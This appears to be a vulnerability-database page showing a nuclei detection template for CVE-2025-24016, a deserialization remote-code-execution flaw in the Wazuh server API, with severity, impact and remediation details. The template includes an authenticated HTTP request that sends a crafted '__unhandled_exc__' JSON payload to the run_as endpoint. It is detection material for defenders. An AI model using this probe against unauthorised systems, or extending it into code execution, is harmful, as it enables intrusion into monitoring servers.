Lucene search
K

Wazuh - Unsafe Deserialization Remote Code Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 93 Views

Critical Remote Code Execution vulnerability in Wazuh server due to unsafe deserialization in API.

Related
Refs
Code
id: CVE-2025-24016

info:
  name: Wazuh - Unsafe Deserialization Remote Code Execution
  author: Hüseyin TINTAŞ,ritikchaddha
  severity: critical
  description: |
    A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
  impact: |
    Successful exploitation allows attackers to execute arbitrary code on the Wazuh server with the privileges of the wazuh-manager process. This can lead to complete system compromise, data exfiltration, lateral movement within the network, and potential denial of service conditions.
  remediation: |
    Upgrade to Wazuh version >= 4.9.1 where this vulnerability has been patched. If immediate upgrade is not possible: Restrict API access to trusted IP addresses only, implement network segmentation to isolate Wazuh servers, monitor for suspicious API requests to the /security/user/authenticate/run_as endpoint, and consider implementing a Web Application Firewall (WAF) to filter malicious requests.
  reference:
    - https://github.com/MuhammadWaseem29/CVE-2025-24016
    - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24016
  classification:
    epss-score: 0.92579
    epss-percentile: 0.99814
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-24016
    cwe-id: CWE-502
    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wazuh
    product: wazuh
    shodan-query: title:"Wazuh"
    fofa-query: app="Wazuh"
  tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev,vuln

flow: http(1) && http(2)

variables:
  payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "NameError"
        negative: true
        internal: true

  - raw:
      - |
        POST /security/user/authenticate/run_as HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Basic {{base64(username + ':' + password)}}

        {{payload}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NameError"

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100d4e57457296c5d16df655cc0470076811726cd8aa99c26c464ea33cb0d10c9ee022100dd484bca54bed26460ea6bd5005bcf3d1650700f90ecef73822d543a49b2ec04:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.9
EPSS0.92579
SSVC
93